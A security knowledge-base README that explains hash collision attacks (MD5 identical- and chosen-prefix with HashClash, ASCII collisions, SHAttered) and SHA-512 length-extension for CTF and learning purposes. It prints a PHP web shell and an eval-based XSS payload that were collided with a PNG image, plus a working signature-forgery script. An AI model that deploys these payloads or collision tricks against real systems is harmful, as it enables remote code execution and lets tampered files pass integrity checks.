Skip to content

Latest commit

 

History

History
310 lines (231 loc) · 16.8 KB

README.md

File metadata and controls

310 lines (231 loc) · 16.8 KB
description
One-way functions that generate a unique hash of some data

Hashing

# Related

{% content-ref url="cracking-hashes.md" %} cracking-hashes.md {% endcontent-ref %}

{% content-ref url="cracking-signatures.md" %} cracking-signatures.md {% endcontent-ref %}

Collisions

Collisions in hashing functions mean multiple different inputs result in the same hash. In a perfect hash function, this should not be feasible. There are a few types of collisions with varying exploitability:

  • Identical Prefix: The prefix of two files are the same, then there are a few collision blocks with different data
  • Chosen Prefix: The prefix of the two files can be anything you want, and may differ. Then after there are some collision blocks, and finally it ends in an identical suffix

For lots of details on how these attacks work and how to exploit them see the following GitHub repository:

{% embed url="https://github.com/corkami/collisions" %}

MD5 - Identical Prefix

When looking at collisions MD5 is very broken. Nowadays it's trivial to create your own Identical Prefix attack within minutes. We can use a tool like HashClash with very efficient code to do the work for us:

{% embed url="https://github.com/cr-marcstevens/hashclash" %} HashClash is a toolset allowing you to make your own hash collisions {% endembed %}

With MD5 you can create any identical blocks consisting of 64 bytes as the prefix, then two collision blocks that differ, and finally any identical suffix.

An example of two files you could create with this is the following:

{% file src="../../.gitbook/assets/collision1_extra.bin" %} First file with 3630 and 93fe in collision blocks {% endfile %}

{% file src="../../.gitbook/assets/collision2_extra.bin" %} Second file with 3631 and 93fd in collision blocks {% endfile %}

{% code title="Difference between collisions" %}

collision1_extra.bin                              collision2_extra.bin
000: 4141 4141 4141 4141  4141 4141 4141 4141  |  4141 4141 4141 4141  4141 4141 4141 4141
...
0b0: 4343 4343 4343 4343  4343 4343 4343 4343  |  4343 4343 4343 4343  4343 4343 4343 4343
0c0: 7465 7374 54ea 9808<!3630>b09d 3d43 6180  |  7465 7374 54ea 9808<!3631>b09d 3d43 6180
0d0: b422 b9a7 5623 4eb5  f058 193f 3bb0 1a42  |  b422 b9a7 5623 4eb5  f058 193f 3bb0 1a42
0e0: c07e 6126 3822 d79a  48f1 e021 06bb 79b9  |  c07e 6126 3822 d79a  48f1 e021 06bb 79b9
0f0: caac ddbd d237 ee6e  6cfd ea0c 388c 089f  |  caac ddbd d237 ee6e  6cfd ea0c 388c 089f
100: 9af5 2e5f f819 769d<!93fe>52ab 6c09 278d  |  9af5 2e5f f819 769d<!93fd>52ab 6c09 278d
110: 8a95 8786 b562 bbf7  669e 1a6f 45de 5859  |  8a95 8786 b562 bbf7  669e 1a6f 45de 5859
120: d534 15f5 e8fb 559e  3969 1590 1e22 f779  |  d534 15f5 e8fb 559e  3969 1590 1e22 f779
130: 787e 315b f744 94d6  e53d a228 8fd0 6678  |  787e 315b f744 94d6  e53d a228 8fd0 6678
140: 4444 4444 4444 4444  4444 4444 4444 4444  |  4444 4444 4444 4444  4444 4444 4444 4444
...
1f0: 4646 4646 4646 4646  4646 4646 4646 4646  |  4646 4646 4646 4646  4646 4646 4646 4646

{% endcode %}

To create such a file you can use the poc_no.sh script from the HashClash repository. It takes one argument which is the prefix for the collision. It can contain:

  • Any exact multiple of 64 bytes, as the identical prefix
  • A multiple of 4 bytes, with a maximum of 12 bytes in total. These will be the starting bytes for the collision blocks

In the example above I used a file containing "A"*64 + "B"*64 + "C"*64 + "test" as the prefix. This will make sure the identical prefix starts with AAA...CCC and the collision blocks start with "test".
Then after this, I added "D"*64 + "E"*64 + "F"*64 to the generated collisions because any data after will only change the hash, but the collision will remain.

$ python3 -c 'print("A"*64 + "B"*64 + "C"*64 + "test", end="")' > prefix  # Create prefix
$ ../scripts/poc_no.sh prefix  # Do collision (takes a few minutes)
...
$ md5sum collision*.bin  # MD5 sums are the same
a83232a6730cdd6102d002e31ffd1c3f  collision1.bin
a83232a6730cdd6102d002e31ffd1c3f  collision2.bin
# # Append data to collisions
$ cat collision1.bin <(python3 -c 'print("D"*64 + "E"*64 + "F"*64, end="")') > collision1_extra.bin
$ cat collision2.bin <(python3 -c 'print("D"*64 + "E"*64 + "F"*64, end="")') > collision2_extra.bin
$ md5sum collision*_extra.bin  # MD5 sums still match
e8842904b573ed3cd545a5b116f70af8  collision1_extra.bin
e8842904b573ed3cd545a5b116f70af8  collision2_extra.bin

MD5 - Chosen Prefix

The chosen prefix attack is a lot more powerful but also takes quite a bit longer to compute. It takes about one day to do one collision between files, depending on your computer.

With such a collision you could make two completely different files have the same md5 sum, only having a few collision blocks at the end, and allowing an identical suffix.

To create a collision like this, you could use the cpc.sh script from HashClash. It takes two different prefix files as input and creates two files with those prefixes and some collisions block appended. Then you can manually add an identical suffix to it later because the collision will remain.

I've let a VPS with 24 cores run for 1.5 days to find a chosen-prefix collision like this. I chose one prefix of a simple 256x256 png image, and the other prefix to be an XSS and PHP shell payload. So I could leave the terminal and look back at it later I used the screen command to start a session, and used screen -r every once in a while to check back into it. Another way would be to redirect the output to some log file to check.

# # From hashclash clone (and build)
$ mkdir workdir && cd workdir
$ ../scripts/cpc.sh 256.png prefix.php  # Takes a long time

The cpc.sh script will then find a collision by appending collision blocks to both prefixes, which is why I added a <!-- comment tag to the shell, and I made sure to add the IEND and CRC to the PNG image to signify the end of the PNG. Some tools like pngcheck complain about data after the IEND, but all other things I've tried parse the PNG completely fine. Here are the original prefixes:

{% code title="256.png (156 bytes)" %}

┌────────┬─────────────────────────┬─────────────────────────┬────────┬────────┐
│0000000089 50 4e 47 0d 0a 1a 0a00 00 00 0d 49 48 44 52 │×PNG__•_┊000_IHDR│
│0000001000 00 01 00 00 00 01 0008 03 00 00 00 6b ac 58000000┊••000k×X│
│0000002054 00 00 00 03 50 4c 5445 ac c8 f2 27 88 57 a8T000PLTE×××'×W×│
│0000003000 00 00 54 49 44 41 5478 9c ed c1 01 01 00 00000TIDATx××ו•00│
│0000004000 80 90 fe af ee 08 0a00 00 00 00 00 00 00 000××××ו_┊00000000│
│0000005000 00 00 00 00 00 00 0000 00 00 00 00 00 00 000000000000000000│
│*       │                         ┊                         │        ┊        │
│0000008000 00 00 00 00 00 00 1801 0f 00 01 4d f6 ca 060000000•┊••0M×ו│
│0000009000 00 00 00 49 45 4e 44ae 42 60 820000IEND┊×B`×    │
└────────┴─────────────────────────┴─────────────────────────┴────────┴────────┘

{% endcode %}

{% code title="shell.php (156 bytes)" %}

<script>eval(location.hash.substring(1)||"alert(document.domain)")</script>
<pre><code>
<?php
system($_GET["cmd"]);
// PoC by J0R1AN
?>
</code></pre>
<!--

{% endcode %}

Then after the collision, there were 9 blocks of 64 bytes added. You can see the raw collision files below:

{% file src="../../.gitbook/assets/256.coll.png" %} 256x256 PNG image with md5: 365010576ad9921c55940b36b9d3e0ca {% endfile %}

{% file src="../../.gitbook/assets/shell.coll.php" %} An XSS and PHP shell with md5: 365010576ad9921c55940b36b9d3e0ca {% endfile %}

MD5 - ASCII Collision

In March 2024, Marc Stevens shared on Twitter a proof of concept for two alphanumeric strings that hash to the same value. Previously, this was only ever done with random bytes as shown in the paragraphs above.

"TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak"
-> faad49866e9498fc1719f5289e7a0269
"TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak"
-> faad49866e9498fc1719f5289e7a0269
                      ^ A = E

The textcoll.sh script allows you to generate such collisions yourself. There is a surprising amount of control possible with the prefix and around the +4 byte in the 21st place. To configure it, the global variables can be changed, and an optional prefix file is given as the first argument.

  • ALPHABET will choose what random characters an attempt may contain.
  • FIRSTBLOCKBYTES will force certain byte positions in the first collision block (64 bytes) of the collision. Byte 21 here will become the collision difference and gets +4 added in the other string. While it does not matter for the value before, the value after +4 must be within the ALPHABET.
  • SECONDBLOCKBYTES will force certain byte positions in the second collision block. These will be identical for both strings, but can otherwise contain random characters from the ALPHABET. It can be commented out to be faster.
  • argv[1] will optionally be a file used as the prefix blocks when searching for a collision. This does not impact performance. Make sure its length is aligned to 64 bytes.

The code below can be used to quickly generate correct ...BLOCKBYTES variables at a certain position. Keep in mind that you can add multiple characters to a single byte to make it more flexible and faster to compute. This can be useful if you don't care about casing, for example.

s = "j0r1an"  # Forced string
o = 0         # Offset

b = [f"\\{c}" if c in '$`"\\' else c for c in s]
print(f'"{" ".join(f"--byte{i+o} {c}" for i, c in enumerate(b))}"')
# "--byte0 j --byte1 0 --byte2 r --byte3 1 --byte4 a --byte5 n"

In the GoogleCTF 2024 - pycalc challenge, the player was required to make two Python payloads of the same MD5 hash where one is benign and the other is malicious. There was a strict sandbox that only allowed simple calculation or string concatenation. By changing a " to & using the +4 on the 21st byte, it was possible to end a string in one payload, while continuing it in the other. This separates the code flow and allows one payload to be a simple string, while the other executes any code.

The exploit idea looks like this:

This can be configured in hashclash with the following variables:

{% code title="textcoll.sh" %}

ALPHABET="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.,_-~=+:;|?@#^&*(){}[]<>"
FIRSTBLOCKBYTES="--byte0 \" --byte21 \"& --byte22 '"
#SECONDBLOCKBYTES=''

{% endcode %}

After a few hours, you should get lucky and find a collision like the following:

")7=P-R@9,l3N+k{sbDhZ"'ipsT0H[Aaa)E)o#wV::77)9xZb??;m**prDkasE|V9F-N(M&;N{Vn@=ea^3=Xrl-qq6Muj62_l@iM@gNST(q{i}O>U|mN##*#I###ak?N
")7=P-R@9,l3N+k{sbDhZ&'ipsT0H[Aaa)E)o#wV::77)9xZb??;m**prDkasE|V9F-N(M&;N{Vn@=ea^3=Xrl-qq6Muj62_l@iM@gNST(q{i}O>U|mN##*#I###ak?N
^                    ^^

More blocks can now be added to these two strings while maintaining the same hash:

{% code title="Beneign payload" overflow="wrap" %}

")7=P-R@9,l3N+k{sbDhZ&'ipsT0H[Aaa)E)o#wV::77)9xZb??;m**prDkasE|V9F-N(M&;N{Vn@=ea^3=Xrl-qq6Muj62_l@iM@gNST(q{i}O>U|mN##*#I###ak?N';print(1337)#"

{% endcode %}

{% code title="Malicious payload" overflow="wrap" %}

")7=P-R@9,l3N+k{sbDhZ"'ipsT0H[Aaa)E)o#wV::77)9xZb??;m**prDkasE|V9F-N(M&;N{Vn@=ea^3=Xrl-qq6Muj62_l@iM@gNST(q{i}O>U|mN##*#I###ak?N';print(1337)#"

{% endcode %}

SHA1

Google Research has found an identical prefix collision in the SHA1 hashing algorithm, and so far is the only one to do so. It still takes 110 years of single-GPU computations to compute a collision yourself, so the only practical way right now is to use the prefix from Google.

{% embed url="https://shattered.io/" %} Website from Google Research going over the details of this SHA1 collision {% endembed %}

SHA1 works by splitting the input into blocks of 512 bits (64 bytes). For every block, it does its operations, and if the two blocks are the same, the two outputs of that block are the same. It keeps going taking the previous block and continuing on it with the next block.

A collision in SHA1 means that there were 2 sets of 5 blocks (320 bytes) found, that when SHA1 hashed give the same hash, while actually being different.

Because of the way SHA1 works, we can start off by using the first 5 blocks from SHAttered, and then if the rest of the files have identical content, their hashes will be the same.

To get different behavior from the two files, a common idea is to check if a certain byte that is different in the collision blocks. This way both files contain both pieces of code, but only one is chosen in both.

if data[102] == 115:
    # Do one thing
else:
    # Do something else

In HTML, this can be done by looking at the innerHTML with charCodeAt(102) in JavaScript. For a simple example see:

  1. https://arw.me/f/1.html
  2. https://arw.me/f/2.html
$ wget https://arw.me/f/1.html && wget https://arw.me/f/2.html
$ sha1sum 1.html 2.html  # SHA1 collision
ba97502d759d58f91ed212d7c981e0cfdfb70eef  1.html
ba97502d759d58f91ed212d7c981e0cfdfb70eef  2.html
$ sha256sum 1.html 2.html  # SHA256 does not match
4477a514fa5e948d69e064a4e00378c69262e32e36c079b76226ae50e3d312cf  1.html
71c484897c7af6cb34cffa8f7c12dc3bf7fc834ed7f57123e21258d2f3fc4ba6  2.html

Length-extension Attack

Hashing algorithms are sometimes used for verifying messages. This can be done by appending a secret "salt" value in front of the data that only the server knows. If the server then generates a hash of this value, it is the only party that is able to do so. If you don't have the salt value you cannot generate a hash that starts with that salt.

But the length-extension attack makes this semi-possible. It allows you to add data to an existing hash, with the catch that there will be some data prepended to your addition.

Hashing functions like SHA256 or SHA512 might sound secure, but without proper precautions to this attack, they may be vulnerable to it. The following hashing algorithms are all vulnerable to this attack:

  • MD4
  • MD5
  • RIPEMD-160
  • SHA-0
  • SHA-1
  • SHA-256
  • SHA-512
  • WHIRLPOOL

To see an example of this attack look at the script below:

import hashlib
import os
from hashpumpy import hashpump

SALT = os.urandom(42)  # Secret

def check_signature(data, signature):
    if hashlib.sha512(SALT + data).hexdigest() == signature:
        return True

def create_sample_signature():
    data = b"name=j0r1an&admin=false"
    signature = hashlib.sha512(SALT + data).hexdigest()

    return data, signature


# Get sample
original_data, original_sig = create_sample_signature()
print(original_data, original_sig)
print("Sample:", check_signature(original_data, original_sig))

# Attack
data_to_add = b"&admin=true"
salt_length = 42  # Can be brute-forced by trying multiple values

forged_sig, forged_data = hashpump(original_sig, original_data, data_to_add, salt_length)
print(forged_data, forged_sig)
print("Attack:", check_signature(forged_data, forged_sig))
# b'name=j0r1an&admin=false\x80\x00\x00...\x00\x00\x00\x02\x08&admin=true'

I also made a writeup of a challenge that uses this attack to perform SQL Injection:

{% embed url="https://jorianwoltjer.com/blog/post/ctf/cyber-santa-is-coming-to-town-2021/warehouse-maintenance" %} A writeup of a challenge using the length-extension attack on SHA512 to perform SQL Injection {% endembed %}